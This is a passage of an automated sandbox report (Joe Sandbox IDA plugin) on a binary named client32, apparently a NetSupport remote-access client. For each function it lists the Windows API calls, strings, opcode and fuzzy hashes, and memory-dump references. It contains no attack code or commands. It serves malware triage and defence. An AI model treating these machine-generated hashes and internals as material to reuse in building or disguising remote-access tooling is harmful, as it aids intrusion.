                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Directory$FolderPathSystemWindows
                                                                                  • String ID: "%PROG%$%SYS%$%WIN%$c:\program files
                                                                                  • API String ID: 1538031420-1992112792
                                                                                  • Opcode ID: ddd6d956b29487594e14033a5dfc4f519d1a9c99b2594e5049262a26b0e0d805
                                                                                  • Instruction ID: 2623f2ed80b282b5754acc89838a0d53b3ad1afe3f6d6f3bb9299b9b15bf7866
                                                                                  • Opcode Fuzzy Hash: ddd6d956b29487594e14033a5dfc4f519d1a9c99b2594e5049262a26b0e0d805
                                                                                  • Instruction Fuzzy Hash: 50412775E0461A5FCB15CE348C94BEAB7E9EF8930DF0041E8E899D7644EBB59944CB80
                                                                                  Function 11061710 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • InitializeCriticalSection.KERNEL32(0000000C), ref: 11061790
                                                                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,11195264,00000000,0002001F,00000000,00000008,?,?,00000001,00000001), ref: 110617F5
                                                                                  • RegCreateKeyExA.ADVAPI32(00000000,?,00000000,11195264,00000000,00020019,00000000,00000008,?), ref: 1106181C
                                                                                  • RegCreateKeyExA.ADVAPI32(00000000,ConfigList,00000000,11195264,00000000,0002001F,00000000,?,?), ref: 1106185B
                                                                                  • RegCreateKeyExA.ADVAPI32(?,ConfigList,00000000,11195264,00000000,00020019,00000000,?,?), ref: 1106188F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Create$CriticalInitializeSection_malloc_memsetwsprintf
                                                                                  • String ID: ConfigList$PCICTL
                                                                                  • API String ID: 4014706405-1939909508
                                                                                  • Opcode ID: cae4a2d1f4de0a4020005886155d60d9723e04be6fdd3d8070ab79db40d2f8ad
                                                                                  • Instruction ID: f687ffc68a66fe95333fcb084f814ecf12f43e5332dda5a21faccb30f4540590
                                                                                  • Opcode Fuzzy Hash: cae4a2d1f4de0a4020005886155d60d9723e04be6fdd3d8070ab79db40d2f8ad
                                                                                  • Instruction Fuzzy Hash: 205130B5A40319AFE710CF65CC85FAABBF8FB84B54F10851AF929DB280D774A504CB50
                                                                                  Function 11027690 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122windowsleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110276B3
                                                                                  • TranslateMessage.USER32(?), ref: 110276E1
                                                                                  • DispatchMessageA.USER32(?), ref: 110276EB
                                                                                  • Sleep.KERNEL32(000003E8), ref: 11027774
                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110277DA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchSleepTranslate
                                                                                  • String ID: Bridge$BridgeThread::Attempting to open bridge...
                                                                                  • API String ID: 3237117195-3850961587
                                                                                  • Opcode ID: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
                                                                                  • Instruction ID: fbec7a20b3d6bea2ef121ca85947d2bcd6ffbd352c9b2bb3e3957ab5b94ca35b
                                                                                  • Opcode Fuzzy Hash: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
                                                                                  • Instruction Fuzzy Hash: F241B375E026369BE711CBD5CC84EBABBA8FB58708F500539E925D3248EB359900CBA1
                                                                                  Function 110B9550 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowPlacement.USER32(00000000,0000002C,110C032C,?,Norm,110C032C), ref: 110B9594
                                                                                  • MoveWindow.USER32(00000000,110C032C,110C032C,110C032C,110C032C,00000001,?,Norm,110C032C), ref: 110B9606
                                                                                  • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B9661
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                                  • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                                  • API String ID: 1092798621-1973987134
                                                                                  • Opcode ID: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
                                                                                  • Instruction ID: 30cf71d2af311bb900ca5215c998a4de0afb875ad97720b4279f64133f28c1c1
                                                                                  • Opcode Fuzzy Hash: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
                                                                                  • Instruction Fuzzy Hash: F7411EB5B00609AFDB08DFA4C895EAEF7B5FF88304F104669E519A7344DB30B945CB90
                                                                                  Function 1100F480 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4AD
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4D0
                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 1100F554
                                                                                  • __CxxThrowException@8.LIBCMT ref: 1100F562
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 1100F575
                                                                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F58F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                  • String ID: bad cast
                                                                                  • API String ID: 2427920155-3145022300
                                                                                  • Opcode ID: 8ccc2bf3d075cb4470613d9a582e19481d5e19c5ba5466d2fc61ee55f0f68dd2
                                                                                  • Instruction ID: b8b94bd42515a6f19c70bc81b3c192d65964a6c5da2ad5a69908043983276998
                                                                                  • Opcode Fuzzy Hash: 8ccc2bf3d075cb4470613d9a582e19481d5e19c5ba5466d2fc61ee55f0f68dd2
                                                                                  • Instruction Fuzzy Hash: BB31E475D002169FDB05CF64D890BEEF7B8EB05369F44066DD926A7280DB72A904CF92
                                                                                  Function 11135700 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 91synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(0000025C,000003E8), ref: 1113572F
                                                                                  • GetTickCount.KERNEL32 ref: 1113578C
                                                                                    • Part of subcall function 111449B0: GetTickCount.KERNEL32 ref: 11144A18
                                                                                  • wsprintfA.USER32 ref: 111357BC
                                                                                    • Part of subcall function 110B86C0: ExitProcess.KERNEL32 ref: 110B8702
                                                                                  • WaitForSingleObject.KERNEL32(0000025C,000003E8), ref: 11135802
                                                                                  Strings
                                                                                  • ResponseChk, xrefs: 11135717
                                                                                  • UI.CPP, xrefs: 111357E9
                                                                                  • Client possibly unresponsive for %d ms (tid=%d)Callstack:, xrefs: 111357B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountObjectSingleTickWait$ExitProcesswsprintf
                                                                                  • String ID: Client possibly unresponsive for %d ms (tid=%d)Callstack:$ResponseChk$UI.CPP
                                                                                  • API String ID: 2020353970-2880927372
                                                                                  • Opcode ID: 5a95c3d6314c03e37156d318e81db83d91de3644f47b7d5644618cf8ee851fd7
                                                                                  • Instruction ID: 29029577b4cabcdd66728ddaf58dbb832e5c2d1ab8d81411842bafe300cf0b31
                                                                                  • Opcode Fuzzy Hash: 5a95c3d6314c03e37156d318e81db83d91de3644f47b7d5644618cf8ee851fd7
                                                                                  • Instruction Fuzzy Hash: 4331F431A01166DBE711CFA5CDC0FAAF3B8FB44719F400678E961DB688DB71A944CB91
                                                                                  Function 110F1600 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 85fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 110F1655
                                                                                  • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 110F166A
                                                                                    • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                  • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F16C3
                                                                                  • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1708
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CreateName$ModulePathShort_strrchr
                                                                                  • String ID: \\.\$nsmvxd.386$pcdvxd.386
                                                                                  • API String ID: 1318148156-3179819359
                                                                                  • Opcode ID: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
                                                                                  • Instruction ID: 97078bb132b3f47e4dd387b208782a62a76e0766a2a430eba886c9c4ac9a83c1
                                                                                  • Opcode Fuzzy Hash: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
                                                                                  • Instruction Fuzzy Hash: 1A318130A44725AFD320DF64C891BD6B7F4BB1D708F008568E2A99B6C5D7B1B588CF94
                                                                                  Function 110817B0 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 79COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memmove.LIBCMT ref: 11081859
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                  • String ID: !m_bReadOnly$..\CTL32\DataStream.cpp$IsA()$m_nLength>=nBytes$nBytes>=0$pData
                                                                                  • API String ID: 1528188558-3417006389
                                                                                  • Opcode ID: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
                                                                                  • Instruction ID: 6b38151c30adb73325f8e92f0dfc04dea1f0409a136c72edecfa6b672fa6b7b9
                                                                                  • Opcode Fuzzy Hash: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
                                                                                  • Instruction Fuzzy Hash: 1A210B3DF187617FC602DE45BC83F9BF7E45F9165CF048039EA4627241E671A804C6A2
                                                                                  Function 1103F720 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 1103F76C
                                                                                  • SetDlgItemTextA.USER32(?,00000471,?), ref: 1103F784
                                                                                  • DestroyCursor.USER32(00000000), ref: 1103F7A1
                                                                                  • SetDlgItemTextA.USER32(?,00000471,00000000), ref: 1103F7B4
                                                                                  • UpdateWindow.USER32(00000000), ref: 1103F7F2
                                                                                    • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1103F7DC
                                                                                  • m_hWnd, xrefs: 1103F7E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ItemText$CursorDestroyExtractIconUpdateWindow_strrchr
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 3726914545-2830328467
                                                                                  • Opcode ID: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
                                                                                  • Instruction ID: 7fabd73ab2c015b19e51bb87ae7bab873905cbda80a3d362d09b7776c5ddc496
                                                                                  • Opcode Fuzzy Hash: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
                                                                                  • Instruction Fuzzy Hash: 4C21D1B9B40315BFE6219AA1DC86F5BB7A8AFC5B05F104418F79A9B2C0DBB4B4008756
                                                                                  Function 1115F620 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetMenuItemCount.USER32(?), ref: 1115F62F
                                                                                  • _memset.LIBCMT ref: 1115F64B
                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 1115F65C
                                                                                    • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                    • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                                  • CheckMenuItem.USER32(?,00000000,00000000), ref: 1115F698
                                                                                  • EnableMenuItem.USER32(?,00000000,00000000), ref: 1115F6AE
                                                                                  • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1115F6C4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
